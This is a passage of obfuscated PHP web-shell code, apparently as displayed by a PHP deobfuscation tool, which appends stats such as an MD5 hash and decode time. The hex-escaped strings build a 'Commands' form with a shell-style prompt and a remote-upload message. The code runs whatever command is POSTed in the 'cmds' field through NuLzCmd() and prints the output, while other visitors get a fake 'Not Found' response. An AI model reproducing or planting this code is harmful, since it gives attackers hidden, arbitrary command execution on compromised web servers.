"\x3c\x73\x70\x61\x6e\40\163\x74\x79\154\145\x3d\x27\x62\x61\143\153\x67\162\157\x75\156\144\x3a\40\43\62\x32\62\x32\62\62\x3b\40\x63\x6f\154\157\x72\72\x20\43\x66\x66\x30\60\x30\60\73\x20\x70\x61\x64\144\151\156\147\x3a\40\x35\160\x78\73\x20\x62\x6f\x72\x64\145\x72\55\162\x61\144\x69\x75\x73\72\40\61\x30\x70\x78\x3b\47\76\x52\x65\155\157\x74\x65\x20\x55\160\x6c\x6f\x61\x64\40\x46\x61\x69\x6c\x65\144\x3c\57\x73\x70\x61\156\x3e"; } } else { echo "\74\x73\160\x61\x6e\40\163\x74\x79\154\x65\75\x27\x62\x61\143\153\147\x72\157\x75\156\144\72\x20\43\62\62\62\x32\x32\62\x3b\x20\143\x6f\154\x6f\162\72\40\x23\146\146\x65\x31\x30\60\73\x20\x70\x61\144\144\151\x6e\147\72\40\x35\160\170\x3b\40\x62\x6f\162\144\x65\162\55\162\141\x64\x69\x75\x73\x3a\40\61\60\x70\170\73\x27\76\127\141\x72\x6e\151\x6e\x67\x3a\x20\x59\x6f\165\162\x20\151\x6e\160\165\x74\40\x55\x52\x4c\40\151\x73\40\x6e\x6f\164\x20\x76\141\154\x69\x64\x2c\x20\x70\154\x65\x61\x73\x65\40\145\156\x74\145\x72\40\x61\x20\166\141\x6c\151\144\40\x55\x52\x4c\74\57\x73\x70\x61\156\x3e"; } } else { echo "\x3c\x73\160\x61\x6e\40\163\x74\171\154\145\75\47\142\x61\143\153\147\x72\x6f\x75\x6e\144\72\40\43\x32\62\62\x32\x32\x32\x3b\40\143\x6f\154\x6f\x72\x3a\x20\43\x66\146\145\x31\60\60\x3b\x20\x70\x61\144\x64\x69\156\x67\x3a\x20\x35\160\x78\x3b\x20\142\x6f\x72\144\x65\162\55\x72\x61\x64\x69\x75\163\x3a\40\61\60\160\170\73\x27\x3e\x57\141\162\x6e\151\156\147\72\x20\124\150\145\x20\x69\156\x70\x75\164\40\125\x52\114\x20\151\x73\40\145\155\160\164\x79\54\x20\160\x6c\x65\141\x73\x65\x20\x69\x6e\x70\x75\164\40\171\157\165\x72\x20\x55\122\114\x3c\x2f\163\x70\x61\x6e\76"; } } echo "\74\160\x72\x65\x3e\x2d\75\x2d\x3d\55\x3d\55\75\x2d\x3d\55\x3d\55\x3d\55\75\x2d\x3d\55\x3d\55\x3d\x2d\x3d\55\75\x2d\75\x2d\x3d\55\75\x2d\x3d\x2d\75\55\x3d\55\x3d\x2d\75\x2d\x3d\x2d\x3d\55\x3d\x2d\x3d\55\74\x2f\160\x72\x65\76"; echo "\12\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\40\x3c\x62\76\x43\x6f\155\x6d\x61\156\144\163\x3c\x2f\x62\76\74\x62\x72\x3e\xa\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40\x3c\154\x61\x62\145\154\40\146\x6f\162\x3d\42\x63\x6d\x64\x73\42\x3e\x24\x3c\x2f\x6c\141\x62\145\154\x3e\xa\40\x20\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x3c\151\x6e\x70\165\164\x20\164\x79\160\x65\x3d\x22\x74\145\170\164\x22\40\x73\x74\x79\154\145\75\42\x77\x69\144\164\150\72\40\x34\60\x76\150\73\42\40\x6e\x61\x6d\145\x3d\x22\143\x6d\x64\163\42\40\151\x64\x3d\42\x63\x6d\144\x73\x22\x20\141\x75\x74\157\x66\x6f\143\x75\x73\x20\160\x6c\x61\x63\145\x68\157\154\144\x65\162\75\42\154\x73\x20\x2d\154\x61\42\x3e\74\x62\x72\x3e\xa\x20\x20\40\40\x20\40\40\40\40\40\x20\40"; echo "\74\164\x65\x78\x74\141\162\x65\x61\x20\x73\x74\171\x6c\x65\x3d\42\146\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x20\x31\x30\x70\170\x3b\40\167\x69\x64\x74\x68\72\x20\x34\x30\x76\x68\73\40\x68\145\151\147\150\x74\x3a\40\x33\60\x30\x70\170\x3b\x22\x3e"; if ($_SERVER["\x52\x45\121\125\x45\123\124\137\115\105\124\x48\117\x44"] === "\x50\x4f\x53\x54") { $komendnya = $_POST["\143\155\144\x73"]; echo NuLzCmd($komendnya); } echo "\74\x2f\x74\145\x78\x74\141\162\145\x61\76"; echo "\x3c\57\146\x6f\162\155\x3e"; } else { NotFound(); } } else { NotFound(); } }

Function Calls

None

Variables

None

Stats

MD5 ac56408c1d53e87700f5af922a1b0466
Eval Count 0
Decode Time 57 ms